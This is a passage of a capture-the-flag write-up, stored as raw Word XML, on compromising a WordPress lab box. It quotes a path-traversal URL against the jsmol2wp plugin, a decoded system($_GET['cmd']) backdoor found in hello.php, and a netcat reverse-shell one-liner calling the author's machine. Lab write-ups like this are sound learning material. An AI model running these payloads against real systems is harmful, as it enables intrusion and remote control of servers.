    </w:p>
    <w:p w14:paraId="2AF32188" w14:textId="3ED729D6" w:rsidR="00693A3D" w:rsidRDefault="00E50344" w:rsidP="00693A3D">
      <w:r w:rsidRPr="00E50344">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5F6CD646" wp14:editId="6D652BF8">
            <wp:extent cx="2865368" cy="3867485"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="659079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7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8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C1CC" w14:textId="089A2F9C" w:rsidR="003E1594" w:rsidRDefault="002B7AFA" w:rsidP="00693A3D">
      <w:r>
        <w:t>And I got into the dashboard:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC75CE4" w14:textId="697999C2" w:rsidR="002B7AFA" w:rsidRDefault="002B7AFA" w:rsidP="00693A3D">
      <w:r w:rsidRPr="002B7AFA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="790CA1D5" wp14:editId="74A959F8">
            <wp:extent cx="7304403" cy="5601185"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="20862533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3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04403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8BB" w14:textId="1974CD64" w:rsidR="00A81D33" w:rsidRDefault="00515377" w:rsidP="00693A3D">
      <w:r>
        <w:t xml:space="preserve">Here I </w:t>
      </w:r>
      <w:r w:rsidR="00952057">
        <w:t>went to the “Pages” section and found there a new page:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E6CD40A" w14:textId="6CE390F1" w:rsidR="00952057" w:rsidRDefault="00C9576B" w:rsidP="00693A3D">
      <w:r w:rsidRPr="00C9576B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="713C594C" wp14:editId="333A9A3E">
            <wp:extent cx="7334886" cy="3467400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="6205210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21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34886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1A86" w14:textId="261BC521" w:rsidR="00E2193F" w:rsidRDefault="006B3D4D" w:rsidP="00693A3D">
      <w:r>
        <w:t>I open this page and read its content:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A6BD50C" w14:textId="1859A7B9" w:rsidR="006B3D4D" w:rsidRDefault="006C1566" w:rsidP="00693A3D">
      <w:r w:rsidRPr="006C1566">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="42841AAE" wp14:editId="61006112">
            <wp:extent cx="7304403" cy="5906012"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="10442932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93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04403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9420" w14:textId="359B2799" w:rsidR="00F46A90" w:rsidRDefault="00CB030D" w:rsidP="00F46A90">
      <w:r>
        <w:t xml:space="preserve">From the first line, I understood that there is </w:t>
      </w:r>
      <w:r w:rsidR="007A6BD7">
        <w:t xml:space="preserve">backdoor in </w:t>
      </w:r>
      <w:r w:rsidR="00DB2B45">
        <w:t>source code of the “Hello Dolly” plugin</w:t>
      </w:r>
      <w:r w:rsidR="00A43836">
        <w:t xml:space="preserve"> so I searched it</w:t>
      </w:r>
      <w:r w:rsidR="002076E0">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003053E9">
        <w:t>(I know the location of “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00505F37">
        <w:t>hello</w:t>
      </w:r>
      <w:r w:rsidR="003053E9">
        <w:t>.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003053E9">
        <w:t xml:space="preserve">” because I found the source code of the jsmol2wp in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003053E9">
        <w:t>github</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003053E9">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00A43836">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C60260F" w14:textId="551AA83D" w:rsidR="00A43836" w:rsidRDefault="00B91008" w:rsidP="00F46A90">
      <w:hyperlink r:id="rId20" w:history="1">
        <w:r w:rsidRPr="00784285">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://www.smol.thm/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&amp;call=getRawDataFromDatabase&amp;query=php://filter/resource=../../../../wp-content/plugins/hello.php</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3B44266F" w14:textId="06158174" w:rsidR="0055142F" w:rsidRDefault="0055142F" w:rsidP="00E95672">
      <w:r>
        <w:t xml:space="preserve">And this is </w:t>
      </w:r>
      <w:r w:rsidR="00E95672">
        <w:t>the file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54AB0DE9" w14:textId="5D7E915F" w:rsidR="00E95672" w:rsidRDefault="003C4377" w:rsidP="00E95672">
      <w:r w:rsidRPr="003C4377">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5B9BBF9A" wp14:editId="01126BD6">
            <wp:extent cx="7296782" cy="5265876"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="11700488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48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96782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321D" w14:textId="64D27710" w:rsidR="003C4377" w:rsidRDefault="005568AE" w:rsidP="008D00A1">
      <w:r>
        <w:t xml:space="preserve">While reading the file’s content, I </w:t>
      </w:r>
      <w:r w:rsidR="00305726">
        <w:t>encountered</w:t>
      </w:r>
      <w:r w:rsidR="00E55F39">
        <w:t xml:space="preserve"> this</w:t>
      </w:r>
      <w:r w:rsidR="008D00A1">
        <w:t xml:space="preserve"> encrypted text:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5138797E" w14:textId="2A4EF810" w:rsidR="008D00A1" w:rsidRDefault="008D00A1" w:rsidP="008D00A1">
      <w:r w:rsidRPr="008D00A1">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="328F3AA8" wp14:editId="3BCA0564">
            <wp:extent cx="5867908" cy="1562235"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4038062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06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BFD9" w14:textId="5957FC5A" w:rsidR="000D66E0" w:rsidRDefault="00B14ABB" w:rsidP="008D00A1">
      <w:r>
        <w:t>It</w:t>
      </w:r>
      <w:r w:rsidR="00B830E1">
        <w:t xml:space="preserve"> seems like a </w:t>
      </w:r>
      <w:r w:rsidR="00F13D5B">
        <w:t xml:space="preserve">base64 </w:t>
      </w:r>
      <w:r w:rsidR="00B86EA6">
        <w:t>encryption,</w:t>
      </w:r>
      <w:r w:rsidR="00625770">
        <w:t xml:space="preserve"> so I decrypted it using base64 and this in the decrypted text:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="245F2A5A" w14:textId="0B8AE447" w:rsidR="00625770" w:rsidRDefault="007145F8" w:rsidP="008D00A1">
      <w:r w:rsidRPr="007145F8">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6A6431A3" wp14:editId="63B8E6EE">
            <wp:extent cx="7556500" cy="4224020"/>
            <wp:effectExtent l="0" t="0" r="6350" b="5080"/>
            <wp:docPr id="12519915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91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67E5" w14:textId="33E37B4D" w:rsidR="00A6000F" w:rsidRDefault="00C35CD2" w:rsidP="001C06E8">
      <w:r>
        <w:t xml:space="preserve">This is an “if” command </w:t>
      </w:r>
      <w:r w:rsidR="006A2FDE">
        <w:t xml:space="preserve">that </w:t>
      </w:r>
      <w:r w:rsidR="00A2784D">
        <w:t>executed after getting decrypted</w:t>
      </w:r>
      <w:r w:rsidR="00386471">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A2784D">
        <w:t>using the “eval” command.</w:t>
      </w:r>
      <w:r w:rsidR="00E165EB">
        <w:t xml:space="preserve"> This if command, actually using the $_GET (</w:t>
      </w:r>
      <w:r w:rsidR="00576A30">
        <w:t xml:space="preserve">“$_GET” is </w:t>
      </w:r>
      <w:r w:rsidR="00E165EB">
        <w:t xml:space="preserve">a php built in array to store parameters and their values </w:t>
      </w:r>
      <w:r w:rsidR="00AA7303">
        <w:t xml:space="preserve">that are given to the function </w:t>
      </w:r>
      <w:r w:rsidR="006A7DAB">
        <w:t xml:space="preserve">through the url </w:t>
      </w:r>
      <w:r w:rsidR="00C84634">
        <w:t>query string</w:t>
      </w:r>
      <w:r w:rsidR="00E165EB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00454BE2">
        <w:t>after placing the “?” cha</w:t>
      </w:r>
      <w:r w:rsidR="00F43390">
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidR="0015174A">
        <w:t>acter</w:t>
      </w:r>
      <w:r w:rsidR="0031183A">
        <w:t>. I used it on other CTF</w:t>
      </w:r>
      <w:r w:rsidR="00C860D6">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="0031183A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F43390">
        <w:t>for example</w:t>
      </w:r>
      <w:r w:rsidR="007A1C81">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00EA111F">
        <w:t>“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00EA111F">
        <w:t>rev_shell.php?cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00EA111F">
        <w:t>=”id”</w:t>
      </w:r>
      <w:r w:rsidR="00F72909">
        <w:t xml:space="preserve"> here I </w:t>
      </w:r>
      <w:r w:rsidR="00B70910">
        <w:t>executed the rev_shell.php file by calling it from the url and giv</w:t>
      </w:r>
      <w:r w:rsidR="007528A8">
        <w:t>ing</w:t>
      </w:r>
      <w:r w:rsidR="00B70910">
        <w:t xml:space="preserve"> it </w:t>
      </w:r>
      <w:r w:rsidR="005A1F6B">
        <w:t xml:space="preserve">a parameter called “cmd” </w:t>
      </w:r>
      <w:r w:rsidR="003B3BF9">
        <w:t>with the value</w:t>
      </w:r>
      <w:r w:rsidR="005A1F6B">
        <w:t xml:space="preserve"> “id”</w:t>
      </w:r>
      <w:r w:rsidR="00ED4170">
        <w:t xml:space="preserve"> so the $_GET array store them like </w:t>
      </w:r>
      <w:r w:rsidR="00014649">
        <w:t>dictiona</w:t>
      </w:r>
      <w:r w:rsidR="00615F28">
        <w:t xml:space="preserve">ries in high level </w:t>
      </w:r>
      <w:r w:rsidR="009905BE">
        <w:t xml:space="preserve">languages </w:t>
      </w:r>
      <w:r w:rsidR="000F4A34">
        <w:t>in this way</w:t>
      </w:r>
      <w:r w:rsidR="0003335F">
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="001C06E8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0003335F">
        <w:t xml:space="preserve">$_GET </w:t>
      </w:r>
      <w:r w:rsidR="009C7ADC">
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidR="0089315B">
        <w:t xml:space="preserve"> [“cmd” =&gt; “id”]</w:t>
      </w:r>
      <w:r w:rsidR="00E165EB">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00615F28">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="734D1D41" w14:textId="77777777" w:rsidR="003E12BA" w:rsidRDefault="003E12BA" w:rsidP="001C06E8"/>
    <w:p w14:paraId="28DE13C9" w14:textId="498FF2EA" w:rsidR="00E746DE" w:rsidRDefault="00992213" w:rsidP="001C06E8">
      <w:r>
        <w:t xml:space="preserve">In addition to that, I saw the values are in </w:t>
      </w:r>
      <w:r w:rsidR="003244A2">
        <w:t xml:space="preserve">Octal and </w:t>
      </w:r>
      <w:r w:rsidR="00CB2503">
        <w:t xml:space="preserve">Hexadecimal </w:t>
      </w:r>
      <w:r w:rsidR="001F70F2">
        <w:t>format</w:t>
      </w:r>
      <w:r w:rsidR="00AC3E90">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="001F70F2">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00B93EA9">
        <w:t xml:space="preserve"> so I </w:t>
      </w:r>
      <w:r w:rsidR="005D22A6">
        <w:t>converted them to strings</w:t>
      </w:r>
      <w:r w:rsidR="00440695">
        <w:t xml:space="preserve"> (each from </w:t>
      </w:r>
      <w:r w:rsidR="00003188">
        <w:t>its</w:t>
      </w:r>
      <w:r w:rsidR="00440695">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A57454">
        <w:t>format</w:t>
      </w:r>
      <w:r w:rsidR="006278F8">
        <w:t xml:space="preserve"> Octal/Hex</w:t>
      </w:r>
      <w:r w:rsidR="00440695">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="005D22A6">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B527598" w14:textId="2E3F1603" w:rsidR="005D22A6" w:rsidRDefault="001F70F2" w:rsidP="001C06E8">
      <w:r>
        <w:t xml:space="preserve">“143” </w:t>
      </w:r>
      <w:r w:rsidR="0015360F">
        <w:t xml:space="preserve">(Octal) -&gt; </w:t>
      </w:r>
      <w:r w:rsidR="00032D3A">
        <w:t>“c”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33D16C9E" w14:textId="23BFC60D" w:rsidR="00032D3A" w:rsidRDefault="00032D3A" w:rsidP="001C06E8">
      <w:r>
        <w:t>“155” (</w:t>
      </w:r>
      <w:r w:rsidR="006B5F29">
        <w:t>Octal</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="001A267D">
        <w:t xml:space="preserve"> -&gt; “</w:t>
      </w:r>
      <w:r w:rsidR="00BF23FD">
        <w:t>m”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E3B29A4" w14:textId="556E31E9" w:rsidR="00BF23FD" w:rsidRDefault="004467F9" w:rsidP="001C06E8">
      <w:r>
        <w:t>“x64” (Hex) -&gt; “d”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6061B804" w14:textId="1909424B" w:rsidR="00D92006" w:rsidRDefault="00B46B78" w:rsidP="001C06E8">
      <w:r>
        <w:t>“x6d” (Hex) -&gt; “</w:t>
      </w:r>
      <w:r w:rsidR="006A0792">
        <w:t>m</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D7F211C" w14:textId="488205C5" w:rsidR="006A0792" w:rsidRDefault="00403103" w:rsidP="001C06E8">
      <w:r>
        <w:t>“144” (</w:t>
      </w:r>
      <w:r w:rsidR="00447C38">
        <w:t>Octal</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00447C38">
        <w:t xml:space="preserve"> -&gt; “d</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB967E3" w14:textId="2414141E" w:rsidR="00C7204F" w:rsidRDefault="00195661" w:rsidP="001C06E8">
      <w:r>
        <w:t>So,</w:t>
      </w:r>
      <w:r w:rsidR="004C20B5">
        <w:t xml:space="preserve"> the </w:t>
      </w:r>
      <w:r w:rsidR="003B6CE8">
        <w:t xml:space="preserve">command is: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12229D78" w14:textId="04C5FF5C" w:rsidR="00195661" w:rsidRDefault="000C7DD9" w:rsidP="001C06E8">
      <w:r w:rsidRPr="000C7DD9">
        <w:t>if (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C7DD9">
        <w:t>isset</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C7DD9">
        <w:t>($_GET</w:t>
      </w:r>
      <w:r w:rsidR="00C53AD6">
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="000C7DD9">
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidR="00C53AD6">
        <w:t>cmd”</w:t>
      </w:r>
      <w:r w:rsidRPr="000C7DD9">
        <w:t xml:space="preserve">])) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74059C86" w14:textId="77777777" w:rsidR="00195661" w:rsidRDefault="000C7DD9" w:rsidP="001C06E8">
      <w:r w:rsidRPr="000C7DD9">
        <w:t xml:space="preserve">{ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29023453" w14:textId="56F907DF" w:rsidR="00195661" w:rsidRDefault="00195661" w:rsidP="001C06E8">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidR="000C7DD9" w:rsidRPr="000C7DD9">
        <w:t>system($_GET["</w:t>
      </w:r>
      <w:r w:rsidR="009E6C86">
        <w:t>cmd</w:t>
      </w:r>
      <w:r w:rsidR="000C7DD9" w:rsidRPr="000C7DD9">
        <w:t>"]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B97DA3" w14:textId="6789B56E" w:rsidR="000C7DD9" w:rsidRDefault="000C7DD9" w:rsidP="001C06E8">
      <w:r w:rsidRPr="000C7DD9">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="213582E6" w14:textId="3B7C3016" w:rsidR="008D61BC" w:rsidRDefault="008E163E" w:rsidP="001C06E8">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">The “system()” </w:t>
      </w:r>
      <w:r w:rsidR="0093733E">
        <w:t xml:space="preserve">php built in </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">function </w:t>
      </w:r>
      <w:r w:rsidR="00B52E81">
        <w:t xml:space="preserve">gets </w:t>
      </w:r>
      <w:r w:rsidR="00D00A8C">
        <w:t xml:space="preserve">a string that represents </w:t>
      </w:r>
      <w:r w:rsidR="00091FDA">
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="00FB64B0">
        <w:t xml:space="preserve"> cli</w:t>
      </w:r>
      <w:r w:rsidR="00091FDA">
        <w:t xml:space="preserve"> command </w:t>
      </w:r>
      <w:r w:rsidR="00FB64B0">
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00E1461F">
        <w:t>depends</w:t>
      </w:r>
      <w:r w:rsidR="003A3BBE">
        <w:t xml:space="preserve"> on the OS</w:t>
      </w:r>
      <w:r w:rsidR="00FB64B0">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00AD79FA">
        <w:t xml:space="preserve"> and executed it on the command line of the</w:t>
      </w:r>
      <w:r w:rsidR="00094B0E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F031C6">
        <w:t>machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F619605" w14:textId="6E76412A" w:rsidR="008F7276" w:rsidRDefault="00495035" w:rsidP="001C06E8">
      <w:r>
        <w:t xml:space="preserve">So, to sum up, this </w:t>
      </w:r>
      <w:r w:rsidR="0074070B">
        <w:t xml:space="preserve">if command </w:t>
      </w:r>
      <w:r w:rsidR="00B656AA">
        <w:t xml:space="preserve">basically </w:t>
      </w:r>
      <w:r w:rsidR="0038609B">
        <w:t xml:space="preserve">gets </w:t>
      </w:r>
      <w:r w:rsidR="001021B8">
        <w:t xml:space="preserve">check </w:t>
      </w:r>
      <w:r w:rsidR="00E52B0F">
        <w:t xml:space="preserve">if the “cmd” </w:t>
      </w:r>
      <w:r w:rsidR="001613BA">
        <w:t>paramete</w:t>
      </w:r>
      <w:r w:rsidR="00705D9A">
        <w:t xml:space="preserve">r was given to the </w:t>
      </w:r>
      <w:r w:rsidR="00726088">
        <w:t xml:space="preserve">php </w:t>
      </w:r>
      <w:r w:rsidR="00A5697B">
        <w:t>script</w:t>
      </w:r>
      <w:r w:rsidR="003D2A4E">
        <w:t xml:space="preserve"> (by checking if it appears in the $_GET array)</w:t>
      </w:r>
      <w:r w:rsidR="00A5697B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006D3120">
        <w:t xml:space="preserve">and if so, it </w:t>
      </w:r>
      <w:r w:rsidR="0070443A">
        <w:t>executes</w:t>
      </w:r>
      <w:r w:rsidR="00B97EA6">
        <w:t xml:space="preserve"> the command that </w:t>
      </w:r>
      <w:r w:rsidR="007F135C">
        <w:t>stored in the “cmd” parameter value</w:t>
      </w:r>
      <w:r w:rsidR="00991E82">
        <w:t xml:space="preserve"> that in the “$_GET” array</w:t>
      </w:r>
      <w:r w:rsidR="007F135C">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="421C3D98" w14:textId="56CFA083" w:rsidR="00DD1617" w:rsidRDefault="00531ADA" w:rsidP="00945FA7">
      <w:r>
        <w:t xml:space="preserve">From this point, I chose to continue by </w:t>
      </w:r>
      <w:r w:rsidR="00012DC8">
        <w:t xml:space="preserve">getting </w:t>
      </w:r>
      <w:r w:rsidR="00AC54F3">
        <w:t xml:space="preserve">a reverse shell from the </w:t>
      </w:r>
      <w:r w:rsidR="007A6AA9">
        <w:t xml:space="preserve">target machine by make the target machine </w:t>
      </w:r>
      <w:r w:rsidR="003D77E9">
        <w:t xml:space="preserve">execute </w:t>
      </w:r>
      <w:r w:rsidR="00402F91">
        <w:t>this</w:t>
      </w:r>
      <w:r w:rsidR="003200E9">
        <w:t xml:space="preserve"> request</w:t>
      </w:r>
      <w:r w:rsidR="00402F91">
        <w:t xml:space="preserve"> command</w:t>
      </w:r>
      <w:r w:rsidR="003200E9">
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00402F91">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003200E9">
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00962E3D" w:rsidRPr="00962E3D">
        <w:t>rm /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00962E3D" w:rsidRPr="00962E3D">
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00962E3D" w:rsidRPr="00962E3D">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00962E3D" w:rsidRPr="00962E3D">
        <w:t>f;mkfifo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00962E3D" w:rsidRPr="00962E3D">
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00962E3D" w:rsidRPr="00962E3D">
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00962E3D" w:rsidRPr="00962E3D">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00962E3D" w:rsidRPr="00962E3D">
        <w:t>f;cat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00962E3D" w:rsidRPr="00962E3D">
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00962E3D" w:rsidRPr="00962E3D">
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00962E3D" w:rsidRPr="00962E3D">
        <w:t xml:space="preserve">/f|/bin/bash -i 2&gt;&amp;1|nc </w:t>
      </w:r>
      <w:r w:rsidR="00A83557">
        <w:t>_</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A83557">
        <w:t>my_own_machine_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A83557">
        <w:t xml:space="preserve">_ </w:t>
      </w:r>
      <w:r w:rsidR="00962E3D" w:rsidRPr="00962E3D">
        <w:t>4444 &gt;/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00962E3D" w:rsidRPr="00962E3D">
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00962E3D" w:rsidRPr="00962E3D">
        <w:t>/f</w:t>
      </w:r>
      <w:r w:rsidR="003200E9">
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="00945FA7">
        <w:t xml:space="preserve">, but first </w:t>
      </w:r>
      <w:r w:rsidR="00CF5713">
        <w:t xml:space="preserve">I created </w:t>
      </w:r>
      <w:r w:rsidR="005333CD">
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="00B7248D">
        <w:t xml:space="preserve">netcat listener </w:t>
      </w:r>
      <w:r w:rsidR="007C2B3A">
        <w:t xml:space="preserve">to </w:t>
      </w:r>
      <w:r w:rsidR="00B403F8">
        <w:t>catch that request</w:t>
      </w:r>
      <w:r w:rsidR="009D757C">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21AB4D3C" w14:textId="76CEFAEB" w:rsidR="009D757C" w:rsidRDefault="008826A3" w:rsidP="00945FA7">
      <w:r w:rsidRPr="008826A3">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7D7D0154" wp14:editId="3FA8EC60">
            <wp:extent cx="1569856" cy="464860"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="6389169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6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41CA" w14:textId="6529F0DA" w:rsidR="00675197" w:rsidRDefault="00F20998" w:rsidP="001C06E8">
      <w:r>
        <w:t xml:space="preserve">Then, I </w:t>
      </w:r>
      <w:r w:rsidR="006775DD">
        <w:t xml:space="preserve">moved to </w:t>
      </w:r>
      <w:r w:rsidR="006C202B">
        <w:t xml:space="preserve">dashboard page of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006C202B">
        <w:t>wpuser</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006C202B">
        <w:t xml:space="preserve"> user that I logged with earlier due to the reason that </w:t>
      </w:r>
      <w:r w:rsidR="00DE6586">
        <w:t>the function “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00DE6586">
        <w:t>hello_dolly</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00DE6586">
        <w:t xml:space="preserve">()” from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00DE6586">
        <w:t>hello.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00DE6586">
        <w:t xml:space="preserve"> file </w:t>
      </w:r>
      <w:r w:rsidR="004D4660">
        <w:t xml:space="preserve">is hooked to </w:t>
      </w:r>
      <w:r w:rsidR="00F27A62">
        <w:t xml:space="preserve">the string </w:t>
      </w:r>
      <w:r w:rsidR="00C47607">
        <w:t>“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C47607">
        <w:t>admin_notices</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C47607">
        <w:t xml:space="preserve">” </w:t>
      </w:r>
      <w:r w:rsidR="008F2C6E">
        <w:t xml:space="preserve">which </w:t>
      </w:r>
      <w:r w:rsidR="002162BA">
        <w:t xml:space="preserve">makes </w:t>
      </w:r>
      <w:r w:rsidR="00912A5F">
        <w:t xml:space="preserve">it </w:t>
      </w:r>
      <w:r w:rsidR="00CB4A95">
        <w:t>run anytime this hooked is called</w:t>
      </w:r>
      <w:r w:rsidR="00AF710A">
        <w:t xml:space="preserve"> (Notice: </w:t>
      </w:r>
      <w:r w:rsidR="009A1CBE">
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidR="00AF710A">
        <w:t xml:space="preserve"> hook is</w:t>
      </w:r>
      <w:r w:rsidR="007623F6">
        <w:t xml:space="preserve"> a string that</w:t>
      </w:r>
      <w:r w:rsidR="00AF710A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00192935">
        <w:t>tied to a function</w:t>
      </w:r>
      <w:r w:rsidR="00764337">
        <w:t xml:space="preserve"> so</w:t>
      </w:r>
      <w:r w:rsidR="00AF710A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009F0280">
        <w:t xml:space="preserve">it runs the function that it hooked to (tide to) whenever </w:t>
      </w:r>
      <w:r w:rsidR="00820EDF">
        <w:t>it called like this in the backend code: “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00B5361C">
        <w:t>do_action</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00B5361C">
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="0035606C">
        <w:t>_</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0035606C">
        <w:t>hook_string</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0035606C">
        <w:t>_</w:t>
      </w:r>
